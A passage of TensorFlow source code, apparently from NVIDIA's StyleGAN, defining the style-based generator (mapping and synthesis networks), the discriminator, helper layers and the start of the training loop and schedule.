1.0 / lrmul runtime_coef = he_std * lrmul else: init_std = he_std / lrmul runtime_coef = lrmul # Create variable. init = tf.initializers.random_normal(0, init_std) return tf.get_variable('weight', shape=shape, initializer=init) * runtime_coef #---------------------------------------------------------------------------- # Fully-connected layer. def dense(x, fmaps, **kwargs): if len(x.shape) > 2: x = tf.reshape(x, [-1, np.prod([d.value for d in x.shape[1:]])]) w = get_weight([x.shape[1].value, fmaps], **kwargs) w = tf.cast(w, x.dtype) return tf.matmul(x, w) #---------------------------------------------------------------------------- # Convolutional layer. def conv2d(x, fmaps, kernel, **kwargs): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs) w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,1,1], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Fused convolution + scaling. # Faster and uses less memory than performing the operations separately. 
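# upscale2d_conv2d() below folds the 2x upscaling into the convolution: the weight tensor is
# zero-padded by one pixel and the four shifted copies are summed, which effectively bakes the
# nearest-neighbour upsampling into a strided tf.nn.conv2d_transpose(). conv2d_downscale2d()
# applies the mirrored trick (summed shifted weights scaled by 0.25) with a strided tf.nn.conv2d().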
def upscale2d_conv2d(x, fmaps, kernel, fused_scale='auto', **kwargs): assert kernel >= 1 and kernel % 2 == 1 assert fused_scale in [True, False, 'auto'] if fused_scale == 'auto': fused_scale = min(x.shape[2:]) * 2 >= 128 # Not fused => call the individual ops directly. if not fused_scale: return conv2d(upscale2d(x), fmaps, kernel, **kwargs) # Fused => perform both ops simultaneously using tf.nn.conv2d_transpose(). w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs) w = tf.transpose(w, [0, 1, 3, 2]) # [kernel, kernel, fmaps_out, fmaps_in] w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) w = tf.cast(w, x.dtype) os = [tf.shape(x)[0], fmaps, x.shape[2] * 2, x.shape[3] * 2] return tf.nn.conv2d_transpose(x, w, os, strides=[1,1,2,2], padding='SAME', data_format='NCHW') def conv2d_downscale2d(x, fmaps, kernel, fused_scale='auto', **kwargs): assert kernel >= 1 and kernel % 2 == 1 assert fused_scale in [True, False, 'auto'] if fused_scale == 'auto': fused_scale = min(x.shape[2:]) >= 128 # Not fused => call the individual ops directly. if not fused_scale: return downscale2d(conv2d(x, fmaps, kernel, **kwargs)) # Fused => perform both ops simultaneously using tf.nn.conv2d(). w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs) w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25 w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,2,2], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Apply bias to the given activation tensor. def apply_bias(x, lrmul=1): b = tf.get_variable('bias', shape=[x.shape[1]], initializer=tf.initializers.zeros()) * lrmul b = tf.cast(b, x.dtype) if len(x.shape) == 2: return x + b return x + tf.reshape(b, [1, -1, 1, 1]) #---------------------------------------------------------------------------- # Leaky ReLU activation. More efficient than tf.nn.leaky_relu() and supports FP16. def leaky_relu(x, alpha=0.2): with tf.variable_scope('LeakyReLU'): alpha = tf.constant(alpha, dtype=x.dtype, name='alpha') @tf.custom_gradient def func(x): y = tf.maximum(x, x * alpha) @tf.custom_gradient def grad(dy): dx = tf.where(y >= 0, dy, dy * alpha) return dx, lambda ddx: tf.where(y >= 0, ddx, ddx * alpha) return y, grad return func(x) #---------------------------------------------------------------------------- # Pixelwise feature vector normalization. def pixel_norm(x, epsilon=1e-8): with tf.variable_scope('PixelNorm'): epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon') return x * tf.rsqrt(tf.reduce_mean(tf.square(x), axis=1, keepdims=True) + epsilon) #---------------------------------------------------------------------------- # Instance normalization. def instance_norm(x, epsilon=1e-8): assert len(x.shape) == 4 # NCHW with tf.variable_scope('InstanceNorm'): orig_dtype = x.dtype x = tf.cast(x, tf.float32) x -= tf.reduce_mean(x, axis=[2,3], keepdims=True) epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon') x *= tf.rsqrt(tf.reduce_mean(tf.square(x), axis=[2,3], keepdims=True) + epsilon) x = tf.cast(x, orig_dtype) return x #---------------------------------------------------------------------------- # Style modulation. 
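# style_mod() below implements the AdaIN-style modulation from the paper: a learned affine
# transform maps the disentangled latent w to one scale and one bias per feature map, and the
# instance-normalized activations are transformed as x * (scale + 1) + bias.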
def style_mod(x, dlatent, **kwargs): with tf.variable_scope('StyleMod'): style = apply_bias(dense(dlatent, fmaps=x.shape[1]*2, gain=1, **kwargs)) style = tf.reshape(style, [-1, 2, x.shape[1]] + [1] * (len(x.shape) - 2)) return x * (style[:,0] + 1) + style[:,1] #---------------------------------------------------------------------------- # Noise input. def apply_noise(x, noise_var=None, randomize_noise=True): assert len(x.shape) == 4 # NCHW with tf.variable_scope('Noise'): if noise_var is None or randomize_noise: noise = tf.random_normal([tf.shape(x)[0], 1, x.shape[2], x.shape[3]], dtype=x.dtype) else: noise = tf.cast(noise_var, x.dtype) weight = tf.get_variable('weight', shape=[x.shape[1].value], initializer=tf.initializers.zeros()) return x + noise * tf.reshape(tf.cast(weight, x.dtype), [1, -1, 1, 1]) #---------------------------------------------------------------------------- # Minibatch standard deviation. def minibatch_stddev_layer(x, group_size=4, num_new_features=1): with tf.variable_scope('MinibatchStddev'): group_size = tf.minimum(group_size, tf.shape(x)[0]) # Minibatch must be divisible by (or smaller than) group_size. s = x.shape # [NCHW] Input shape. y = tf.reshape(x, [group_size, -1, num_new_features, s[1]//num_new_features, s[2], s[3]]) # [GMncHW] Split minibatch into M groups of size G. Split channels into n channel groups c. y = tf.cast(y, tf.float32) # [GMncHW] Cast to FP32. y -= tf.reduce_mean(y, axis=0, keepdims=True) # [GMncHW] Subtract mean over group. y = tf.reduce_mean(tf.square(y), axis=0) # [MncHW] Calc variance over group. y = tf.sqrt(y + 1e-8) # [MncHW] Calc stddev over group. y = tf.reduce_mean(y, axis=[2,3,4], keepdims=True) # [Mn111] Take average over fmaps and pixels. y = tf.reduce_mean(y, axis=[2]) # [Mn11] Split channels into c channel groups y = tf.cast(y, x.dtype) # [Mn11] Cast back to original data type. y = tf.tile(y, [group_size, 1, s[2], s[3]]) # [NnHW] Replicate over group and pixels. return tf.concat([x, y], axis=1) # [NCHW] Append as new fmap. #---------------------------------------------------------------------------- # Style-based generator used in the StyleGAN paper. # Composed of two sub-networks (G_mapping and G_synthesis) that are defined below. def G_style( latents_in, # First input: Latent vectors (Z) [minibatch, latent_size]. labels_in, # Second input: Conditioning labels [minibatch, label_size]. truncation_psi = 0.7, # Style strength multiplier for the truncation trick. None = disable. truncation_cutoff = 8, # Number of layers for which to apply the truncation trick. None = disable. truncation_psi_val = None, # Value for truncation_psi to use during validation. truncation_cutoff_val = None, # Value for truncation_cutoff to use during validation. dlatent_avg_beta = 0.995, # Decay for tracking the moving average of W during training. None = disable. style_mixing_prob = 0.9, # Probability of mixing styles during training. None = disable. is_training = False, # Network is under training? Enables and disables specific features. is_validation = False, # Network is under validation? Chooses which value to use for truncation_psi. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. components = dnnlib.EasyDict(), # Container for sub-networks. Retained between calls. **kwargs): # Arguments for sub-networks (G_mapping and G_synthesis). # Validate arguments. 
assert not is_training or not is_validation assert isinstance(components, dnnlib.EasyDict) if is_validation: truncation_psi = truncation_psi_val truncation_cutoff = truncation_cutoff_val if is_training or (truncation_psi is not None and not tflib.is_tf_expression(truncation_psi) and truncation_psi == 1): truncation_psi = None if is_training or (truncation_cutoff is not None and not tflib.is_tf_expression(truncation_cutoff) and truncation_cutoff <= 0): truncation_cutoff = None if not is_training or (dlatent_avg_beta is not None and not tflib.is_tf_expression(dlatent_avg_beta) and dlatent_avg_beta == 1): dlatent_avg_beta = None if not is_training or (style_mixing_prob is not None and not tflib.is_tf_expression(style_mixing_prob) and style_mixing_prob <= 0): style_mixing_prob = None # Setup components. if 'synthesis' not in components: components.synthesis = tflib.Network('G_synthesis', func_name=G_synthesis, **kwargs) num_layers = components.synthesis.input_shape[1] dlatent_size = components.synthesis.input_shape[2] if 'mapping' not in components: components.mapping = tflib.Network('G_mapping', func_name=G_mapping, dlatent_broadcast=num_layers, **kwargs) # Setup variables. lod_in = tf.get_variable('lod', initializer=np.float32(0), trainable=False) dlatent_avg = tf.get_variable('dlatent_avg', shape=[dlatent_size], initializer=tf.initializers.zeros(), trainable=False) # Evaluate mapping network. dlatents = components.mapping.get_output_for(latents_in, labels_in, **kwargs) # Update moving average of W. if dlatent_avg_beta is not None: with tf.variable_scope('DlatentAvg'): batch_avg = tf.reduce_mean(dlatents[:, 0], axis=0) update_op = tf.assign(dlatent_avg, tflib.lerp(batch_avg, dlatent_avg, dlatent_avg_beta)) with tf.control_dependencies([update_op]): dlatents = tf.identity(dlatents) # Perform style mixing regularization. if style_mixing_prob is not None: with tf.name_scope('StyleMix'): latents2 = tf.random_normal(tf.shape(latents_in)) dlatents2 = components.mapping.get_output_for(latents2, labels_in, **kwargs) layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis] cur_layers = num_layers - tf.cast(lod_in, tf.int32) * 2 mixing_cutoff = tf.cond( tf.random_uniform([], 0.0, 1.0) < style_mixing_prob, lambda: tf.random_uniform([], 1, cur_layers, dtype=tf.int32), lambda: cur_layers) dlatents = tf.where(tf.broadcast_to(layer_idx < mixing_cutoff, tf.shape(dlatents)), dlatents, dlatents2) # Apply truncation trick. if truncation_psi is not None and truncation_cutoff is not None: with tf.variable_scope('Truncation'): layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis] ones = np.ones(layer_idx.shape, dtype=np.float32) coefs = tf.where(layer_idx < truncation_cutoff, truncation_psi * ones, ones) dlatents = tflib.lerp(dlatent_avg, dlatents, coefs) # Evaluate synthesis network. with tf.control_dependencies([tf.assign(components.synthesis.find_var('lod'), lod_in)]): images_out = components.synthesis.get_output_for(dlatents, force_clean_graph=is_template_graph, **kwargs) return tf.identity(images_out, name='images_out') #---------------------------------------------------------------------------- # Mapping network used in the StyleGAN paper. def G_mapping( latents_in, # First input: Latent vectors (Z) [minibatch, latent_size]. labels_in, # Second input: Conditioning labels [minibatch, label_size]. latent_size = 512, # Latent vector (Z) dimensionality. label_size = 0, # Label dimensionality, 0 if no labels. dlatent_size = 512, # Disentangled latent (W) dimensionality. 
dlatent_broadcast = None, # Output disentangled latent (W) as [minibatch, dlatent_size] or [minibatch, dlatent_broadcast, dlatent_size]. mapping_layers = 8, # Number of mapping layers. mapping_fmaps = 512, # Number of activations in the mapping layers. mapping_lrmul = 0.01, # Learning rate multiplier for the mapping layers. mapping_nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu'. use_wscale = True, # Enable equalized learning rate? normalize_latents = True, # Normalize latent vectors (Z) before feeding them to the mapping layers? dtype = 'float32', # Data type to use for activations and outputs. **_kwargs): # Ignore unrecognized keyword args. act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[mapping_nonlinearity] # Inputs. latents_in.set_shape([None, latent_size]) labels_in.set_shape([None, label_size]) latents_in = tf.cast(latents_in, dtype) labels_in = tf.cast(labels_in, dtype) x = latents_in # Embed labels and concatenate them with latents. if label_size: with tf.variable_scope('LabelConcat'): w = tf.get_variable('weight', shape=[label_size, latent_size], initializer=tf.initializers.random_normal()) y = tf.matmul(labels_in, tf.cast(w, dtype)) x = tf.concat([x, y], axis=1) # Normalize latents. if normalize_latents: x = pixel_norm(x) # Mapping layers. for layer_idx in range(mapping_layers): with tf.variable_scope('Dense%d' % layer_idx): fmaps = dlatent_size if layer_idx == mapping_layers - 1 else mapping_fmaps x = dense(x, fmaps=fmaps, gain=gain, use_wscale=use_wscale, lrmul=mapping_lrmul) x = apply_bias(x, lrmul=mapping_lrmul) x = act(x) # Broadcast. if dlatent_broadcast is not None: with tf.variable_scope('Broadcast'): x = tf.tile(x[:, np.newaxis], [1, dlatent_broadcast, 1]) # Output. assert x.dtype == tf.as_dtype(dtype) return tf.identity(x, name='dlatents_out') #---------------------------------------------------------------------------- # Synthesis network used in the StyleGAN paper. def G_synthesis( dlatents_in, # Input: Disentangled latents (W) [minibatch, num_layers, dlatent_size]. dlatent_size = 512, # Disentangled latent (W) dimensionality. num_channels = 3, # Number of output color channels. resolution = 1024, # Output resolution. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. use_styles = True, # Enable style inputs? const_input_layer = True, # First layer is a learned constant? use_noise = True, # Enable noise inputs? randomize_noise = True, # True = randomize noise inputs every time (non-deterministic), False = read noise inputs from variables. nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu' use_wscale = True, # Enable equalized learning rate? use_pixel_norm = False, # Enable pixelwise feature vector normalization? use_instance_norm = True, # Enable instance normalization? dtype = 'float32', # Data type to use for activations and outputs. fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically. blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering. structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. 
force_clean_graph = False, # True = construct a clean graph that looks nice in TensorBoard, False = default behavior. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) def blur(x): return blur2d(x, blur_filter) if blur_filter else x if is_template_graph: force_clean_graph = True if force_clean_graph: randomize_noise = False if structure == 'auto': structure = 'linear' if force_clean_graph else 'recursive' act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity] num_layers = resolution_log2 * 2 - 2 num_styles = num_layers if use_styles else 1 images_out = None # Primary inputs. dlatents_in.set_shape([None, num_styles, dlatent_size]) dlatents_in = tf.cast(dlatents_in, dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0), trainable=False), dtype) # Noise inputs. noise_inputs = [] if use_noise: for layer_idx in range(num_layers): res = layer_idx // 2 + 2 shape = [1, use_noise, 2**res, 2**res] noise_inputs.append(tf.get_variable('noise%d' % layer_idx, shape=shape, initializer=tf.initializers.random_normal(), trainable=False)) # Things to do at the end of each layer. def layer_epilogue(x, layer_idx): if use_noise: x = apply_noise(x, noise_inputs[layer_idx], randomize_noise=randomize_noise) x = apply_bias(x) x = act(x) if use_pixel_norm: x = pixel_norm(x) if use_instance_norm: x = instance_norm(x) if use_styles: x = style_mod(x, dlatents_in[:, layer_idx], use_wscale=use_wscale) return x # Early layers. with tf.variable_scope('4x4'): if const_input_layer: with tf.variable_scope('Const'): x = tf.get_variable('const', shape=[1, nf(1), 4, 4], initializer=tf.initializers.ones()) x = layer_epilogue(tf.tile(tf.cast(x, dtype), [tf.shape(dlatents_in)[0], 1, 1, 1]), 0) else: with tf.variable_scope('Dense'): x = dense(dlatents_in[:, 0], fmaps=nf(1)*16, gain=gain/4, use_wscale=use_wscale) # tweak gain to match the official implementation of Progressing GAN x = layer_epilogue(tf.reshape(x, [-1, nf(1), 4, 4]), 0) with tf.variable_scope('Conv'): x = layer_epilogue(conv2d(x, fmaps=nf(1), kernel=3, gain=gain, use_wscale=use_wscale), 1) # Building blocks for remaining layers. def block(res, x): # res = 3..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): with tf.variable_scope('Conv0_up'): x = layer_epilogue(blur(upscale2d_conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale)), res*2-4) with tf.variable_scope('Conv1'): x = layer_epilogue(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale), res*2-3) return x def torgb(res, x): # res = 2..resolution_log2 lod = resolution_log2 - res with tf.variable_scope('ToRGB_lod%d' % lod): return apply_bias(conv2d(x, fmaps=num_channels, kernel=1, gain=1, use_wscale=use_wscale)) # Fixed structure: simple and efficient, but does not support progressive growing. if structure == 'fixed': for res in range(3, resolution_log2 + 1): x = block(res, x) images_out = torgb(resolution_log2, x) # Linear structure: simple but inefficient. if structure == 'linear': images_out = torgb(2, x) for res in range(3, resolution_log2 + 1): lod = resolution_log2 - res x = block(res, x) img = torgb(res, x) images_out = upscale2d(images_out) with tf.variable_scope('Grow_lod%d' % lod): images_out = tflib.lerp_clip(img, images_out, lod_in - lod) # Recursive structure: complex but efficient. 
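    # Note: the recursive structure builds a tree of tf.cond ops so that, for the current
    # lod_in, only the resolutions actually needed are evaluated at run time. cset() wraps
    # an existing lambda in a new tf.cond (conditions added later take priority), and grow()
    # recurses from coarse to fine, blending adjacent ToRGB outputs with lerp during the
    # fade-in phase, mirroring the Grow_lod blocks of the linear structure.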
if structure == 'recursive': def cset(cur_lambda, new_cond, new_lambda): return lambda: tf.cond(new_cond, new_lambda, cur_lambda) def grow(x, res, lod): y = block(res, x) img = lambda: upscale2d(torgb(res, y), 2**lod) img = cset(img, (lod_in > lod), lambda: upscale2d(tflib.lerp(torgb(res, y), upscale2d(torgb(res - 1, x)), lod_in - lod), 2**lod)) if lod > 0: img = cset(img, (lod_in < lod), lambda: grow(y, res + 1, lod - 1)) return img() images_out = grow(x, 3, resolution_log2 - 3) assert images_out.dtype == tf.as_dtype(dtype) return tf.identity(images_out, name='images_out') #---------------------------------------------------------------------------- # Discriminator used in the StyleGAN paper. def D_basic( images_in, # First input: Images [minibatch, channel, height, width]. labels_in, # Second input: Labels [minibatch, label_size]. num_channels = 1, # Number of input color channels. Overridden based on dataset. resolution = 32, # Input resolution. Overridden based on dataset. label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu', use_wscale = True, # Enable equalized learning rate? mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, 0 = disable. mbstd_num_features = 1, # Number of features for the minibatch standard deviation layer. dtype = 'float32', # Data type to use for activations and outputs. fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically. blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering. structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) def blur(x): return blur2d(x, blur_filter) if blur_filter else x if structure == 'auto': structure = 'linear' if is_template_graph else 'recursive' act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity] images_in.set_shape([None, num_channels, resolution, resolution]) labels_in.set_shape([None, label_size]) images_in = tf.cast(images_in, dtype) labels_in = tf.cast(labels_in, dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype) scores_out = None # Building blocks. 
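    # Note: the discriminator mirrors the generator in reverse. fromrgb() maps an RGB image
    # to feature maps at a given resolution, block() halves the resolution, and the final
    # 4x4 block appends the minibatch-stddev features before the dense layers that produce
    # the scores.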
def fromrgb(x, res): # res = 2..resolution_log2 with tf.variable_scope('FromRGB_lod%d' % (resolution_log2 - res)): return act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=1, gain=gain, use_wscale=use_wscale))) def block(x, res): # res = 2..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): if res >= 3: # 8x8 and up with tf.variable_scope('Conv0'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale))) with tf.variable_scope('Conv1_down'): x = act(apply_bias(conv2d_downscale2d(blur(x), fmaps=nf(res-2), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale))) else: # 4x4 if mbstd_group_size > 1: x = minibatch_stddev_layer(x, mbstd_group_size, mbstd_num_features) with tf.variable_scope('Conv'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale))) with tf.variable_scope('Dense0'): x = act(apply_bias(dense(x, fmaps=nf(res-2), gain=gain, use_wscale=use_wscale))) with tf.variable_scope('Dense1'): x = apply_bias(dense(x, fmaps=max(label_size, 1), gain=1, use_wscale=use_wscale)) return x # Fixed structure: simple and efficient, but does not support progressive growing. if structure == 'fixed': x = fromrgb(images_in, resolution_log2) for res in range(resolution_log2, 2, -1): x = block(x, res) scores_out = block(x, 2) # Linear structure: simple but inefficient. if structure == 'linear': img = images_in x = fromrgb(img, resolution_log2) for res in range(resolution_log2, 2, -1): lod = resolution_log2 - res x = block(x, res) img = downscale2d(img) y = fromrgb(img, res - 1) with tf.variable_scope('Grow_lod%d' % lod): x = tflib.lerp_clip(x, y, lod_in - lod) scores_out = block(x, 2) # Recursive structure: complex but efficient. if structure == 'recursive': def cset(cur_lambda, new_cond, new_lambda): return lambda: tf.cond(new_cond, new_lambda, cur_lambda) def grow(res, lod): x = lambda: fromrgb(downscale2d(images_in, 2**lod), res) if lod > 0: x = cset(x, (lod_in < lod), lambda: grow(res + 1, lod - 1)) x = block(x(), res); y = lambda: x if res > 2: y = cset(y, (lod_in > lod), lambda: tflib.lerp(x, fromrgb(downscale2d(images_in, 2**(lod+1)), res - 1), lod_in - lod)) return y() scores_out = grow(2, resolution_log2 - 2) # Label conditioning from "Which Training Methods for GANs do actually Converge?" if label_size: with tf.variable_scope('LabelSwitch'): scores_out = tf.reduce_sum(scores_out * labels_in, axis=1, keepdims=True) assert scores_out.dtype == tf.as_dtype(dtype) scores_out = tf.identity(scores_out, name='scores_out') return scores_out #---------------------------------------------------------------------------- File: training/training_loop.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Main training script.""" import os import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib from dnnlib.tflib.autosummary import autosummary import config import train from training import dataset from training import misc from metrics import metric_base #---------------------------------------------------------------------------- # Just-in-time processing of training images before feeding them to the networks. 
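# Illustrative sketch (not part of the original pipeline and never called; the helper name
# below is made up for illustration): the FadeLOD step of process_reals() in plain NumPy.
# The fractional part of `lod` blends each image with a 2x box-averaged copy of itself,
# so a newly introduced resolution level fades in smoothly.

def _fade_lod_demo_np(x, lod):
    """Blend NCHW array `x` with its 2x box-downscaled-then-upscaled copy by frac(lod)."""
    n, c, h, w = x.shape  # assumes h and w are even
    y = x.reshape(n, c, h // 2, 2, w // 2, 2).mean(axis=(3, 5), keepdims=True)
    y = np.tile(y, (1, 1, 1, 2, 1, 2)).reshape(n, c, h, w)
    return x + (y - x) * (lod - np.floor(lod))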
def process_reals(x, lod, mirror_augment, drange_data, drange_net): with tf.name_scope('ProcessReals'): with tf.name_scope('DynamicRange'): x = tf.cast(x, tf.float32) x = misc.adjust_dynamic_range(x, drange_data, drange_net) if mirror_augment: with tf.name_scope('MirrorAugment'): s = tf.shape(x) mask = tf.random_uniform([s[0], 1, 1, 1], 0.0, 1.0) mask = tf.tile(mask, [1, s[1], s[2], s[3]]) x = tf.where(mask < 0.5, x, tf.reverse(x, axis=[3])) with tf.name_scope('FadeLOD'): # Smooth crossfade between consecutive levels-of-detail. s = tf.shape(x) y = tf.reshape(x, [-1, s[1], s[2]//2, 2, s[3]//2, 2]) y = tf.reduce_mean(y, axis=[3, 5], keepdims=True) y = tf.tile(y, [1, 1, 1, 2, 1, 2]) y = tf.reshape(y, [-1, s[1], s[2], s[3]]) x = tflib.lerp(x, y, lod - tf.floor(lod)) with tf.name_scope('UpscaleLOD'): # Upscale to match the expected input/output size of the networks. s = tf.shape(x) factor = tf.cast(2 ** tf.floor(lod), tf.int32) x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1]) x = tf.tile(x, [1, 1, 1, factor, 1, factor]) x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor]) return x #---------------------------------------------------------------------------- # Evaluate time-varying training parameters. def training_schedule( cur_nimg, training_set, num_gpus, lod_initial_resolution = 4, # Image resolution used at the beginning. lod_training_kimg = 600, # Thousands of real images to show before doubling the resolution. lod_transition_kimg = 600, # Thousands of real images to show when fading in new layers. minibatch_base = 16, # Maximum minibatch size, divided evenly among GPUs. minibatch_dict = {}, # Resolution-specific overrides. max_minibatch_per_gpu = {}, # Resolution-specific maximum minibatch size per GPU. G_lrate_base = 0.001, # Learning rate for the generator. G_lrate_dict = {}, # Resolution-specific overrides. D_lrate_base = 0.001, # Learning rate for the discriminator. D_lrate_dict = {}, # Resolution-specific overrides. lrate_rampup_kimg = 0, # Duration of learning rate ramp-up. tick_kimg_base = 160, # Default interval of progress snapshots. tick_kimg_dict = {4: 160, 8:140, 16:120, 32:100, 64:80, 128:60, 256:40, 512:30, 1024:20}): # Resolution-specific overrides. # Initialize result dict. s = dnnlib.EasyDict() s.kimg = cur_nimg / 1000.0 # Training phase. phase_dur = lod_training_kimg + lod_transition_kimg phase_idx = int(np.floor(s.kimg / phase_dur)) if phase_dur > 0 else 0 phase_kimg = s.kimg - phase_idx * phase_dur # Level-of-detail and resolution. s.lod = training_set.resolution_log2 s.lod -= np.floor(np.log2(lod_initial_resolution)) s.lod -= phase_idx if lod_transition_kimg > 0: s.lod -= max(phase_kimg - lod_training_kimg, 0.0) / lod_transition_kimg s.lod = max(s.lod, 0.0) s.resolution = 2 ** (training_set.resolution_log2 - int(np.floor(s.lod))) # Minibatch size. s.minibatch = minibatch_dict.get(s.resolution, minibatch_base) s.minibatch -= s.minibatch % num_gpus if s.resolution in max_minibatch_per_gpu: s.minibatch = min(s.minibatch, max_minibatch_per_gpu[s.resolution] * num_gpus) # Learning rate. s.G_lrate = G_lrate_dict.get(s.resolution, G_lrate_base) s.D_lrate = D_lrate_dict.get(s.resolution, D_lrate_base) if lrate_rampup_kimg > 0: rampup = min(s.kimg / lrate_rampup_kimg, 1.0) s.G_lrate *= rampup s.D_lrate *= rampup # Other parameters. s.tick_kimg = tick_kimg_dict.get(s.resolution, tick_kimg_base) return s #---------------------------------------------------------------------------- # Main training script. 
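# Worked example (using the default arguments of training_schedule() above): with
# lod_training_kimg = lod_transition_kimg = 600, each 1200 kimg phase first trains at a
# fixed resolution for 600 kimg and then fades in the next resolution over 600 kimg.
# For a 1024x1024 dataset and lod_initial_resolution = 4, training starts at lod 8
# (resolution 4) and reaches lod 0 (full 1024x1024) after 8 such phases, i.e. 9600 kimg.
# In training_loop() below, the moving-average generator Gs uses
# beta = 0.5 ** (minibatch / (G_smoothing_kimg * 1000)); e.g. a minibatch of 32 with
# G_smoothing_kimg = 10.0 gives a beta of roughly 0.9978 per update.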
def training_loop( submit_config, G_args = {}, # Options for generator network. D_args = {}, # Options for discriminator network. G_opt_args = {}, # Options for generator optimizer. D_opt_args = {}, # Options for discriminator optimizer. G_loss_args = {}, # Options for generator loss. D_loss_args = {}, # Options for discriminator loss. dataset_args = {}, # Options for dataset.load_dataset(). sched_args = {}, # Options for train.TrainingSchedule. grid_args = {}, # Options for train.setup_snapshot_image_grid(). metric_arg_list = [], # Options for MetricGroup. tf_config = {}, # Options for tflib.init_tf(). G_smoothing_kimg = 10.0, # Half-life of the running average of generator weights. D_repeats = 1, # How many times the discriminator is trained per G iteration. minibatch_repeats = 4, # Number of minibatches to run before adjusting training parameters. reset_opt_for_new_lod = True, # Reset optimizer internal state (e.g. Adam moments) when new layers are introduced? total_kimg = 15000, # Total length of the training, measured in thousands of real images. mirror_augment = False, # Enable mirror augment? drange_net = [-1,1], # Dynamic range used when feeding image data to the networks. image_snapshot_ticks = 1, # How often to export image snapshots? network_snapshot_ticks = 10, # How often to export network snapshots? save_tf_graph = False, # Include full TensorFlow computation graph in the tfevents file? save_weight_histograms = False, # Include weight histograms in the tfevents file? resume_run_id = None, # Run ID or network pkl to resume training from, None = start from scratch. resume_snapshot = None, # Snapshot index to resume training from, None = autodetect. resume_kimg = 0.0, # Assumed training progress at the beginning. Affects reporting and training schedule. resume_time = 0.0): # Assumed wallclock time at the beginning. Affects reporting. # Initialize dnnlib and TensorFlow. ctx = dnnlib.RunContext(submit_config, train) tflib.init_tf(tf_config) # Load training set. training_set = dataset.load_dataset(data_dir=config.data_dir, verbose=True, **dataset_args) # Construct networks. with tf.device('/gpu:0'): if resume_run_id is not None: network_pkl = misc.locate_network_pkl(resume_run_id, resume_snapshot) print('Loading networks from "%s"...' 
